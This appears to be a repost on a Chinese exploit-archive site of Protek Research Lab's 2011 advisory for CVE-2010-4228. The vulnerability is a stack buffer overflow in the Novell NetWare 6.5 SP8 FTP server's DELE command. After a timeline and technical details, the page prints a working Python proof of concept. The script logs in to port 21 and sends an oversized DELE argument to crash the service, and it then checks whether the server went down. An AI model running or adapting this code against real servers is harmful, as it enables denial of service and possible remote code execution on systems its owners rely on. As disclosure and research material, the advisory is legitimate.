首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Novell Netware 6.5 SP8 Remote Code Execution
来源:http://www.protekresearchlab.com/ 作者:ProtekResearch 发布时间:2011-03-22   
#####################################################################################

Application:   Novell Netware NWFTPD.NLM DELE Remote Code Execution Vulnerability

Platforms:   Novell Netware 6.5 SP8

Exploitation:   Remote code execution

CVE Number:   CVE-2010-4228

Novell TID:   5089510

ZDI:   ZDI-11-106

{PRL}:   2011-05

Author:   Francis Provencher (Protek Research Lab's)

Website:   http://www.protekresearchlab.com/

Twitter:   @ProtekResearch


#####################################################################################

1) Introduction
2) Timeline
3) Technical details
4) PoC


#####################################################################################

===============
1) Introduction
===============

Novell, Inc. is a global software and services company based in Waltham, Massachusetts.
The company specializes in enterprise operating systems, such as SUSE Linux Enterprise
and Novell NetWare; identity, security, and systems management solutions; and
collaboration solutions, such as Novell Groupwise and Novell Pulse.

Novell was instrumental in making the Utah Valley a focus for technology and software
development. Novell technology contributed to the emergence of local area networks,
which displaced the dominant mainframe computing model and changed computing worldwide.
Today, a primary focus of the company is on developing open source software for
enterprise clients.

(http://en.wikipedia.org/wiki/Novell)

#####################################################################################

============================
2) Timeline
============================

2010-09-22 - Vulnerability reported to vendor
2011-03-18 - Coordinated public release of advisory

#####################################################################################

============================
3) Technical details
============================

This vulnerability allows remote attackers to execute arbitrary code on vulnerable
installations of Novell Netware. Authentication is required to exploit this vulnerability.
The flaw exists within NWFTPD.NLM. When handling the argument provided to the DELE command
the application copies user supplied data to a fixed length stack buffer.
A remote attacker can exploit this vulnerability to execute arbitrary code under the
context of the super user.

#####################################################################################

===========
4) The Code
===========


 
#!/usr/bin/python
  
import socket, sys
 
# Source:
# http://www.protekresearchlab.com/index.php?option=com_content&view=article&id=25&Itemid=25
  
host = (sys.argv[1])
data = "\x44\x45\x4c\x45\x20\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x43\x43\x43\x43\x43\x43\x43\x43\x43\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x45\x45\x45\x45\x45\x45\x46\x46\x46\x46\x47\x47\x47\x47\x48\x48\x44\x43\x42\x41\x0d\x0a"
 
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 
try:
    s.connect((host, 21))
    d=s.recv(1024)
    print (d)
    s.send("USER toto\r\n") #anonymous login so anything goes
    d=s.recv(1024)
    print (d)
    s.send("PASS toto\r\n")
    d=s.recv(1024)
    print (d)
    s.send(data)
    d=s.recv(1024)
    print (d)
    s.close()
     
    try:
        s.connect((host,21))
    except:
        print ("\r\n[i] Beep Beep, take a look to your Abend log file.")
except:
    print ("[i] Error")




#####################################################################################

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Audio Editor Pro 5.0 Buffer Ov
·SpoonFTP 1.2 RETR Denial of Se
·Siemens Tecnomatix FactoryLink
·Novell Netware NWFTPD.NLM DELE
·Iconics GENESIS32 and GENESIS6
·RealPlayer <= 14.0.1.633 Heap
·7-Technologies IGSS 9.00.00.11
·DATAC RealWin Multiple Vulnera
·Symantec LiveUpdate Administra
·Adobe Flash Player AVM Bytecod
·ACTi ASOC 2200 Web Configurato
·HP OpenView NNM nnmRptConfig n
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved